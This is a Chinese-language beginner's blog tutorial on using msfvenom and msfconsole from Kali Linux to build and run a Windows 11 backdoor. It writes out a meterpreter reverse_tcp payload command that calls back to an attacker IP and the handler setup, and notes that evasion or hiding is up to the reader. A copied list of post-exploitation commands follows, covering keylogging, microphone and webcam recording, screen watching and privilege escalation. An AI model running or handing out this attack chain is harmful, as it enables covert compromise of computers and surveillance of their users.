本人技术小白学习过程中所发第一篇文章,请多多支持指导。
一、MSF简介
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
渗透环境要求
使用Kali Linux虚拟机进行演示操作
攻击主机:Kali Linux虚拟机
目标靶机:Windows11
软件:Msfvenom、Msfconsole(Kali Linux系统内置)
二、渗透流程
1.Kali Linux进入Root模式并查看kali Linux虚拟机ip
不在Root模式下运行可能会出现操作者权限不够的提示,为了避免命令执行失败,第一步先将Kali进入Root管理员模式。执行命令之后输入Kali的密码时,密码是被隐藏的。
命令:sudo su
命令:ifconfig
2.生成可执行文件
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=1234 -f exe -o muma.exe
接下来运行命令来生成可执行文件
把生成的可执行文件放入目标靶机Windows11中
3.运行msfconsole命令
命令:msfconsole
4.配置参数
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.189.128(填写自己主机的IP地址)
(4)命令: set LPORT 1234(填写刚才生成文件时写的端口号)
(5)命令: show options(查看设置参数)(Required项yes时为必填)
(6)命令: exploit -j(攻击在后台执行)
5.在靶机Windows11打开可执行文件
可以自行进行免杀模块或隐藏
win11打开muma.exe文件后
6.渗透
命令:sessions(查看上钩的目标靶机)
命令:sessions -i -1(选择要攻击的用户)
这个时候就已经成功了
7.测试
我们用放入系统命令 shell
8.meterpreter命令(转载自https://blog.csdn.net/RFZ_322/article/details/123367668 感谢大佬)
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
声明
本文所涉及内容仅供学习,任何人在利用本文相关内容时,所造成的相关违法行为引起的法律纠纷问题,本人概不负责。